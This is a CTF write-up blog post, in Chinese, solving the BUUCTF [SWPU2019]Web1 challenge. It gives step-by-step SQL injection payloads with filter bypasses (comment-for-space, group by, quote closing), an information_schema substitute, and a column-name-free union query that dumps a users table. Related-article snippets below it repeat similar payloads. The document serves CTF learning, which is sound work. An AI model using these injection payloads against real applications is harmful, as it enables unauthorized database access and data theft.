buuctf [SWPU2019]Web1 1

最新推荐文章于 2024-05-14 23:43:15 发布
最新推荐文章于 2024-05-14 23:43:15 发布
阅读量1.5k 收藏 9
点赞数 3
分类专栏: ctf buuctf 刷题日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45642610/article/details/114748031
版权
ctf 同时被 3 个专栏收录
27 篇文章 3 订阅
订阅专栏
buuctf
26 篇文章 2 订阅
订阅专栏
刷题日记
24 篇文章 2 订阅
订阅专栏

buuctf [SWPU2019]Web1 1 sql 无列名注入 二次注入

注册登录发布广告
在这里插入图片描述

1'测试
在这里插入图片描述

存在sql注入
经测试,or,空格,#被过滤
在这里插入图片描述
在这里插入图片描述

不能用order by测试列数,用group by代替
注释符#用,'3代替,数字随便
(这里的'相当于闭合了输入语句里参数的右引号,变成'3'字符串,此时整个语句没有注释符)(如果参数不在sql语句末尾,那不是失败了?有无懂哥?)
空格用/**/代替

1'/**/group/**/by/**/22,'3

在这里插入图片描述

1'/**/group/**/by/**/23,'3

在这里插入图片描述

所以有22列

-1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

回显位2和3

在这里插入图片描述

-1'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

information_schema.tables用mysql.innodb_table_stats代替
table_schema用database_name代替(为什么不能用前者呢?是因为数据库类型不同吗?有无懂哥?)
在这里插入图片描述
这时就要无列名注入了
因为没有mysql.innodb_column_stats这个方法,查不了列名
大概原理就是没有列名,那就给它取名,然后按别名正常继续注入

//-1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述

待我慢慢给你讲
首先有两个表ads,users。flag在users表第三列,其他可以自己注入看看。
格式

select group_concat(b) from (select 1,2 as b,3 union select * from users)a

a,b为别名,可以乱取。b别名为users表第二列别名。
select 1,2,3 很熟悉吧,就是上面我们用来判断回显的payload。有基础的都知道在数据库中这样会显示三列分别为1,2,3(为什么我不上图?别问,问就是懒。),而1,2,3就是三列列名
select 1,2,3 union select * from users就会以1,2,3为列名,查询users表中的内容了。就这么简单。为什么这样的语句结果就会这样?那就涉及数据库怎么底层了,懂得都懂,懂的不必说,不懂的很难说,反正我是不懂的,呵呵。
回到正题,在加上前面select group_concat(b)就是查询users表第二列。
那为什么是1,2,3没有4,5,6或以上呢。因为users表就只有三列,多输入列数就报错了。
可以用下面payload取得列数

-1'/**/union/**/select/**/1,(select/**/group_concat(1)/**/from/**/users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22

在这里插入图片描述

有多少个1就有多少列。
最后就是ads表了,这个是查不出来的。
用上面的语句查出来有3列,当你爆查询表里面的内容时会报错,回头看之前的就变成了4个1,变成4列,再爆,再报错,再回头看,5列。。。真是不能满足我小小的好奇心,气死人了

__byb__
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
[SWPU2019]Web1
weixin_45577185的博客
09-12 499
1.二次注入 2.bypass information_schema 3.无列名注入 bypass information_schema 尝试使用单引号判断是否存在注入 报错说明存在二次注入 题目环境过滤了空格,我们使用/**/来进行绕过。过滤了or,因此我们无法使用order by 以及information_schema这个库。因为过滤了注释符,所以查询语句的最后我们要闭合单引号 本题在但是比赛中 bypass information_schema 是利用的 sys.schema_auto_incr
[BUUCTF][SWPU2019]Web1
朋克归零膏的博客
10-28 557
无列名注入fuzz过滤词绕过空格。
[SWPU2019]Web1 1
shinygod的博客
03-23 3109
知识点:sql联合注入(各种关键词的替换) 我们先注册,尝试以admin为用户名 提示已被注册,说明存在admin用户,但密码我没有爆破成功,还是老老实实的注册吧。(如果各位大佬成功了,望留言!!) 注册个账号,进入里面唯一能够输入的就是广告位 有报错,且会过滤一些关键词,例如and,order by…空格也被过滤了。 空格我们可以用/**/来代替,order by可以用group by来代替,注释符可以用’来闭合。 当我们查列名23会报错 -1'/**/group/**/by/**/23,'ab
CTF例题:[SWPU2019]Web1(无列名注入)
最新发布
qq_64395221的博客
05-14 894
1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/b,3/**/union/**/select/**/*/**/from/**/users)as a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,10,21,22/**/&&/**/’1‘=’1---查出users的列名,但没有想要的信息。进入题目后发现有登录和注册接口,直接注册登录。
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
Jlink驱动文件1.rar
06-04
本压缩包文件"Jlink驱动文件1.rar"包含的是JLink驱动的9.40版本,这是一个针对JLink设备的最新更新。版本号9.40意味着此驱动可能包含了对先前版本的一些修复、性能优化或新特性的添加。对于开发者来说,及时更新驱动...
SWPU大数据概论课程报告
01-31
《SWPU大数据概论课程报告》是一份详细探讨大数据领域的学习资料,主要针对对大数据感兴趣的学员或研究人员。作为一份课程报告,它很可能包含了大数据的基本概念、核心技术、应用领域以及未来发展趋势等多个方面的...
swpu前端实验4的实验
04-23
swpu
SWPUCTF2019web题复现
bmth666的博客
04-05 1203
[SWPU2019]easy_web 有一个登录框,试了试万能密码失败,那就注册吧 登录后发现有一个申请广告,在标题处输入11111111’,发现报错,应该是sql注入 禁用了or,空格等等,先使用union发现有22列 -1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22 后面发现还可以用-1'/**/group/**/by/**/22,'1,一样可以爆出为22列 查看数据库:-1'
ctf刷题小结
quan9i的博客
05-15 6220
CTF刷题小记,文章同步于我的个人博客,欢迎大家访问
buuctf-Web1
m0_62094846的博客
04-09 3946
在登陆界面用sql注入的各种手段都没用,注册进去看看 抓包后发现数据包有点像xss,也能使它弹窗,但是好像没什么用 用标题1' 会有关于sql语句的弹窗(但是如果抓包就不会出现) 也能说明是单引号闭合(1"就不行,能知道是sql注入也不容易) 闭合语句的时候出了问题(1'#,1'--+) 1'%23不会被过滤,但是好像起不到闭合的作用 有一个小细节之前一直忘记了: 用#闭合的是后面的内容,而这道题需要闭合的后面的内容就是单引号,所以后面加一个单引号就行 1''..
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_team!"。根据引用\[3\]的内容,我们可以得知下载下来的文件是一个压缩包,但是打不开,经过一系列的分析后发现了一个二维码,扫描后显示"flag不在这"。综合这些信息,我们可以推断\[SWPU2019\]伟大的侦探这个题目可能涉及到密码解密和二维码的分析。 #### 引用[.reference_title] - *1* *3* [BUUCTF MISC刷题](https://blog.csdn.net/wow0524/article/details/122448957)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF msic 专题(59)[SWPU2019]伟大的侦探](https://blog.csdn.net/tt_npc/article/details/124389689)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值